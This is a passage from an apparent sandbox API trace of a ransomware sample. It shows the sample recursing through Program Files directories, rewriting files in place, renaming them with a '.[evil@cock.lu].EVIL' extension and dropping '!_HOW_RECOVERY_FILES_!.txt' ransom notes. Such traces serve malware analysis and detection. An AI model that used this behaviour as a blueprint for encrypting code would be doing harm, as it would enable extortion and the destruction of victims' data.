Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.[evil@cock.lu].evil")) returned 1 [0089.903] ??_V@YAXPEAX@Z () returned 0x1 [0089.906] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", dwFileAttributes=0x0) returned 0 [0089.907] FindNextFileW (in: hFindFile=0x84b11dd500, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.907] wcsstr (_Str="vstoee100.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.907] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0089.907] wcscmp (_String1="vstoee100.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.907] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="vstoee100.tlb") returned 0x0 [0089.907] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 0x42 [0089.907] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0089.909] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4298, lpOverlapped=0x0) returned 1 [0089.928] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.928] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.928] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.928] _errno () returned 0x84b1160840 [0089.928] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.928] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x42a0, lpOverlapped=0x0) returned 1 [0089.929] CloseHandle (hObject=0x1a4) returned 1 [0089.929] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.929] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.929] __uncaught_exception () returned 0x84b1160800 [0089.929] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.929] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.[evil@cock.lu].evil")) returned 1 [0089.930] ??_V@YAXPEAX@Z () returned 0x1 [0089.932] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", dwFileAttributes=0x0) returned 0 [0089.933] FindNextFileW (in: hFindFile=0x84b11dd500, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.933] wcsstr (_Str="vstoee90.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.933] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 65 [0089.933] wcscmp (_String1="vstoee90.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.933] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="vstoee90.tlb") returned 0x0 [0089.933] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 0x41 [0089.933] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0089.934] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x5898, lpOverlapped=0x0) returned 1 [0089.962] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.962] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.962] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.962] _errno () returned 0x84b1160840 [0089.962] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.962] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x58a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x58a0, lpOverlapped=0x0) returned 1 [0089.962] CloseHandle (hObject=0x1a4) returned 1 [0089.962] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.963] __uncaught_exception () returned 0x84b1160800 [0089.963] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.[evil@cock.lu].evil")) returned 1 [0089.964] ??_V@YAXPEAX@Z () returned 0x1 [0089.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", dwFileAttributes=0x0) returned 0 [0089.967] FindNextFileW (in: hFindFile=0x84b11dd500, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.967] FindClose (in: hFindFile=0x84b11dd500 | out: hFindFile=0x84b11dd500) returned 1 [0089.967] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 0x34 [0089.967] strlen (_Str="${KEY}") returned 0x6 [0089.967] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.967] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.968] strlen (_Str="${CODE}") returned 0x7 [0089.968] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.968] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.968] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.968] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.968] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.968] __uncaught_exception () returned 0x84b1160800 [0089.968] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.969] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0089.969] FindClose (in: hFindFile=0x84b11dd2c0 | out: hFindFile=0x84b11dd2c0) returned 1 [0089.969] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared") returned 0x2f [0089.969] strlen (_Str="${KEY}") returned 0x6 [0089.969] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.969] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.969] strlen (_Str="${CODE}") returned 0x7 [0089.969] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.969] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.969] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.969] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.970] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.970] __uncaught_exception () returned 0x84b1160800 [0089.970] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.971] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0089.971] wcsstr (_Str="Services", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.971] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\Services") returned 39 [0089.971] wcscmp (_String1=".", _String2="Services") returned -1 [0089.971] wcscmp (_String1="..", _String2="Services") returned -1 [0089.971] wcslen (_String="C:\\\\Program Files\\Common Files\\Services") returned 0x27 [0089.971] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\Services" | out: _Destination="C:\\\\Program Files\\Common Files\\Services") returned 0x0 [0089.971] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\Services\\*") returned="C:\\\\Program Files\\Common Files\\Services\\*" [0089.971] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd980 [0089.972] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.972] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\Services\\.") returned 41 [0089.972] wcscmp (_String1=".", _String2=".") returned 0 [0089.972] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.972] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.972] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\Services\\..") returned 42 [0089.972] wcscmp (_String1=".", _String2="..") returned -1 [0089.972] wcscmp (_String1="..", _String2="..") returned 0 [0089.972] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.972] wcsstr (_Str="verisign.bmp", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.972] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\Services\\verisign.bmp") returned 52 [0089.972] wcscmp (_String1="verisign.bmp", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.972] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="verisign.bmp") returned 0x0 [0089.972] wcslen (_String="C:\\\\Program Files\\Common Files\\Services\\verisign.bmp") returned 0x34 [0089.972] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.972] GetLastError () returned 0x5 [0089.972] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0089.972] FindClose (in: hFindFile=0x84b11dd980 | out: hFindFile=0x84b11dd980) returned 1 [0089.973] wcslen (_String="C:\\\\Program Files\\Common Files\\Services") returned 0x27 [0089.973] strlen (_Str="${KEY}") returned 0x6 [0089.973] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.973] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.973] strlen (_Str="${CODE}") returned 0x7 [0089.973] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.973] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.973] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.973] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\Services\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.973] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.973] __uncaught_exception () returned 0x84b1160800 [0089.973] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.974] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0089.974] wcsstr (_Str="System", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.974] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System") returned 37 [0089.974] wcscmp (_String1=".", _String2="System") returned -1 [0089.974] wcscmp (_String1="..", _String2="System") returned -1 [0089.974] wcslen (_String="C:\\\\Program Files\\Common Files\\System") returned 0x25 [0089.974] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System" | out: _Destination="C:\\\\Program Files\\Common Files\\System") returned 0x0 [0089.974] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\*") returned="C:\\\\Program Files\\Common Files\\System\\*" [0089.974] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd7a0 [0089.974] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.974] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\.") returned 39 [0089.974] wcscmp (_String1=".", _String2=".") returned 0 [0089.974] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.974] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.975] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\..") returned 40 [0089.975] wcscmp (_String1=".", _String2="..") returned -1 [0089.975] wcscmp (_String1="..", _String2="..") returned 0 [0089.975] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.975] wcsstr (_Str="ado", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.975] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado") returned 41 [0089.975] wcscmp (_String1=".", _String2="ado") returned -1 [0089.975] wcscmp (_String1="..", _String2="ado") returned -1 [0089.975] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado") returned 0x29 [0089.975] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\ado" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\ado") returned 0x0 [0089.975] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\*") returned="C:\\\\Program Files\\Common Files\\System\\ado\\*" [0089.975] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd5c0 [0090.012] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.012] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\.") returned 43 [0090.012] wcscmp (_String1=".", _String2=".") returned 0 [0090.012] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.012] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.012] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\..") returned 44 [0090.012] wcscmp (_String1=".", _String2="..") returned -1 [0090.012] wcscmp (_String1="..", _String2="..") returned 0 [0090.012] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.012] wcsstr (_Str="adojavas.inc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.012] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 54 [0090.012] wcscmp (_String1="adojavas.inc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.012] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="adojavas.inc") returned 0x0 [0090.012] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 0x36 [0090.012] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.013] GetLastError () returned 0x5 [0090.013] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.013] wcsstr (_Str="adovbs.inc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.013] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 52 [0090.013] wcscmp (_String1="adovbs.inc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.013] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="adovbs.inc") returned 0x0 [0090.013] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 0x34 [0090.013] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.013] GetLastError () returned 0x5 [0090.013] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.013] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.013] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\en-US") returned 47 [0090.013] wcscmp (_String1=".", _String2="en-US") returned -1 [0090.013] wcscmp (_String1="..", _String2="en-US") returned -1 [0090.013] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\en-US") returned 0x2f [0090.013] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\ado\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\ado\\en-US") returned 0x0 [0090.013] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\*" [0090.013] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd620 [0090.014] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.014] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\.") returned 49 [0090.014] wcscmp (_String1=".", _String2=".") returned 0 [0090.014] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.014] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.014] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\..") returned 50 [0090.014] wcscmp (_String1=".", _String2="..") returned -1 [0090.014] wcscmp (_String1="..", _String2="..") returned 0 [0090.014] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.014] wcsstr (_Str="msader15.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.014] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 64 [0090.014] wcscmp (_String1="msader15.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.014] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msader15.dll.mui") returned 0x0 [0090.014] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 0x40 [0090.014] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.014] GetLastError () returned 0x5 [0090.014] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0090.014] FindClose (in: hFindFile=0x84b11dd620 | out: hFindFile=0x84b11dd620) returned 1 [0090.015] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\en-US") returned 0x2f [0090.015] strlen (_Str="${KEY}") returned 0x6 [0090.015] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0090.015] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0090.015] strlen (_Str="${CODE}") returned 0x7 [0090.015] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0090.015] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.015] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.015] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\ado\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.015] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.015] __uncaught_exception () returned 0x84b1160800 [0090.015] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.017] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.017] wcsstr (_Str="msader15.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.017] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 54 [0090.017] wcscmp (_String1="msader15.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.017] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msader15.dll") returned 0x0 [0090.017] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 0x36 [0090.017] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.017] GetLastError () returned 0x5 [0090.017] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.017] wcsstr (_Str="msado15.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.017] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 53 [0090.017] wcscmp (_String1="msado15.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.017] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado15.dll") returned 0x0 [0090.017] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 0x35 [0090.017] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.018] GetLastError () returned 0x5 [0090.018] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.018] wcsstr (_Str="msado20.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.018] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 53 [0090.018] wcscmp 